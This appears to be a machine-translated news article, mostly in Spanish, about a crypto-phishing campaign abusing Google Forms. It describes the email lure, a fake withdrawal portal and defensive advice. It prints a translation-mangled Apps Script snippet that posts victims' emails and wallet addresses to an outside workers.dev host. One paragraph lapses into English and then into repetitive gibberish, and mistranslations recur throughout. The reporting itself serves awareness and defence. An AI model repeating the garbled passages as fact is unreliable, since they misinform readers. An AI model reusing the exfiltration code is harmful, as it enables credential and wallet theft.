Google Forms, conocido por sus perfectas capacidades para la recopilación de datos, ahora se ha convertido en un campo de batalla para una campaña criptofishing de proliferación rápida. Inicialmente detectado a fines de 2024, este horario recibió una tracción considerable, especialmente en el segundo trimestre de 2025.
El ataque comienza con un correo electrónico no solicitado con un enlace aparentemente real a una página de Google Forms. Este enlace efectivamente evita muchos filtros de spam, lo que dificulta que los usuarios reconozcan la amenaza. Al hacer clic en el enlace, el receptor desprevenido es recibido por un formulario que imita un intercambio de criptomonedas bien conocido, alegando que el usuario tiene un «pago pendiente de 1.275 BTC».
Las víctimas se llevan a un portal de retiro fraudulento donde tienen que verificar su dirección de billetera y pagar los llamados «costos de red». Además, inconscientemente ofrecen sus referencias, que se envían rápidamente a un servidor de comando y control (C2) oculto detrás de un defensor-Cloudflare. En consecuencia, todos los fondos enviados como parte de este horario se llevan a carteras de mezcladores, de modo que el rastro digital de la transacción se elimina de manera efectiva.
Lo que distingue esta operación es la explotación inteligente de las opciones de informes de los formularios de Google. Dado que cada intento de phishing proviene de la infraestructura SMTP de Google, los controles de reputación de dominio generalmente producen resultados limpios, de modo que estos correos electrónicos malignos pueden lograr una visibilidad casi perfecta en los usuarios en las cajas.
The analysts of Kaspersky identified a clear increase in such phishing attempts, with reference to an increase of 63 percent in Google-forms-based phishing e-mails during an assessment of the end points of consumers at the beginning of July 2025. This trend has pushed the campaign in the most efficiency of the labeling of the labeling of the labeling of the labeling of the Engineering, which of the Engineering, which of the Engineering, which of the ENGINE-Socials of the Engineering, which es el etiquetado de la mota, que de los motores-sociales de la ingeniería, cuál de la ingeniería SoCaling SoCaling. año.
El mecanismo detrás de la infección se basa en la cosecha de referencias de Webhooks integrados. El formulario maligno utiliza un Webhook unido a la Script APPS que extrae inmediatamente los datos cuando la víctima hace clic en «Enviar» para evitar la necesidad de completar el formulario. Además, el script inicia una disposición de JavaScript única a un sitio web de clon con un front-end reacto pulido y una API de frascos de Python. Este sitio promueve todas las solicitudes al C2 del atacante.
Un fragmento filtrado de una plantilla de forma comprometida ilustra este proceso de exfiltración:
javascript
Función en formsubmit (e) {
Conste Payload = json.stringify ({
E -Mail: E.NamedValues[‘Email’][0]»
Billetera: e.namedvalues[‘Wallet Address’][0]
});
Urlfthapp.fetch (‘https://worker-cyptodrip.workers.dev/submit’, {
Método: ‘Post’,
Tipo de contenido: ‘Aplicación/JSON’,
Carga útil: carga útil
});
}
A la luz de estos desarrollos alarmantes, los expertos en seguridad enfatizan la necesidad de implementar una estrategia de defensa de múltiples capas. Se aconseja a las organizaciones que incluyan reglas de des-des-cotizaciones que forman correos electrónicos en cuarentena en formularios de cuarentena en cuarentena que no están informadas explícitamente. Además, el uso del contenido del navegador que puede bloquear las solicitudes salientes para empleados desconocidos, los dominios pueden mejorar la seguridad.
Además, las iniciativas continuas para la conciencia de seguridad deben fortalecer la guía fundamental de que cada promesa de «criptomoneda gratuita» probablemente sea demasiado buena para ser verdadera a través de una presentación de la forma.
